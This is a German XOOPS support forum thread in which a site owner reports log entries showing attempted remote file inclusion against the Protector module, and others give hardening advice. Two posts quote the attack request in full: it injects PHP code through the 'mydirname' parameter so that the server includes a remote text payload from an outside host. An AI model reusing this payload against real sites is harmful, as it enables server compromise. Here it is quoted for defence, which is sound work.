MyXoops Forum

Aw:: Hacking Versuch? [Sicherheit von XOOPS] - myXOOPS German Support

Muki

Co-Administrator
Gepostet am:17.06.2009 10:32
Muki
Muki Offline (Show more)
Co-Administrator
Posts: 1903
Since: 18.04.2006
#4

Aw:: Hacking Versuch?

Zitat:

igor schrieb:
ich beobachte Seit geraumer Zeit massiv steigende Anfragen die ca so ausschauenhttp://www.domain.de//xoops_lib/modules/protector/oninstall.ph p?mydirname=a(){}include($_GET[a]);function
v&a=http://URL_ERSETZT.ac.jp/b1ttletX1.txt????
hängt das im Kausalem Zusammenhang mit der alten News zur Sicherheitslücke im Protector?


Was hier interessant wäre, ist der Versuch von wo aus das ganze gestattet wurde.
Dieses siehst Du an:
Zitat:
=http://URL_ERSETZT.ac.jp/

Ob diese Domain wirklich die Ursprungsdomain ist lässt sich schwer sagen, jedoch ist Japan kein rechtsfreier Raum.

Es gibt ja auch die Möglichkeit wenn diese Anfragen immer die gleichen sind den Anfragenden ein Ergebnis zu geben, jedoch mit anderem Inhalt als dem erhofften. Ein Angreifender Server muss immer um einen Angriff zu starten erst selbst mal "die Hosen herunterlassen" und wird hierdurch selbst angreifbar.

Zitat:

igor schrieb:
Gibt es eigentlich im Moment eine Empfelung ob man eine XOOPS Installation lieber mit oder ohne den Protector nutzen sollte?

Da ist man geteilter Meinung. Die einen verzichten darauf die anderen nicht. Da der Protector nun Bestandteil des neuen Xoops ist, wurde er auch eine Zusätzliche Angriffsquelle. Ob ihn sich jemand installiert oder nicht obliegt der Entscheidung des einzelnen.
Bei Installation von gewarteten Modulen die nach wie vor immer wieder Aktualisiert werden, ist MEINE MEINUNG man kann auf Ihn verzichten.
Wie gesagt das ist meine persönliche Meinung.

Muki
Es gibt keine dummen Fragen, nur dumme Antworten (Ausnahmen bestätigen die Regel).

igor

"myXOOPs"-Neuling
Gepostet am:17.06.2009 09:33
igor
igor Offline (Show more)
"myXOOPs"-Neuling
Posts: 23
Since: 26.03.2006
#3

Aw:: Hacking Versuch?

Naja xoops_lib und xoops_data liegen eh schon ausserhalb des Wurzelverzeichnis der Domain (auch wenn mein XOOPS mir das nicht glauben mag, denn es warnt mich beim einloggen in den Admin-Bereich immer).
Wie gesagt, ich hab die Aufrufe deswegen registriert weil meine Fehlerseite 404 mir gemeldet hat, das jemand versucht diese Aufrufe zu starten.

Gibt es eigentlich im Moment eine Empfelung ob man eine XOOPS Installation lieber mit oder ohne den Protector nutzen sollte?

Und die zweite Frage die ich mir stelle, Hilft es den Entwicklern vom Protector Modul, wenn Sie sehen, wie genau die Angriffe aussehen und wie versucht wird Daten zu entlocken.

Advertisement

Gepostet am:0
Advertisement (Show more)
Posts: 0
Since: 0


Hier könnten Sie Ihre Anzeige aufgeben!
Bitte kontaktieren Sie uns, um mehr darüber zu erfahren.

Micha578

"myXOOPs"-Könner
Gepostet am:17.06.2009 08:10
Micha578
Micha578 Offline (Show more)
"myXOOPs"-Könner
Posts: 426
Since: 02.07.2007
#2

Aw:: Hacking Versuch?

Ich würde Dir vorschlagen die Verzeichnisnamen xoops_lib und data umzubenennen und mit einer .htaccess abzusichern.

Natürlich in der mainfile.php die Ordnernamen mit angleichen und Cache löschen nicht vergessen...
Mfg, Micha

igor

"myXOOPs"-Neuling
Gepostet am:17.06.2009 07:56
igor
igor Offline (Show more)
"myXOOPs"-Neuling
Posts: 23
Since: 26.03.2006
#1

Hacking Versuch?

Hallo,

ich beobachte Seit geraumer Zeit massiv steigende Anfragen die ca so ausschauenhttp://www.domain.de//xoops_lib/modules/protector/oninstall.ph p?mydirname=a(){}include($_GET[a]);function
v&a=http://URL_ERSETZT.ac.jp/b1ttletX1.txt????
hängt das im Kausalem Zusammenhang mit der alten News zur Sicherheitslücke im Protector?
Hilft es irgendjemand zu wissen, was genau sie versuchen dort einzubinden?
ich mein solange die bei mir auf nem Fehler 404 Landen ist mir das erstmal Relativ egal.

Schönen Gruß
Igor
Diesen Thread durchsuchen:  1 Anonyme Benutzer

Aktuell aus dem Forum

Forum Thema Antworten Views Letzter Beitrag
Modulentwicklung New Xoops Xcreate Module 0 4086 26.11.2025 15:22
efkan Gehe zum letzten Beitrag
Modulentwicklung XOOPS Custom Field Module 1 1557 24.11.2025 11:21
Goffy Gehe zum letzten Beitrag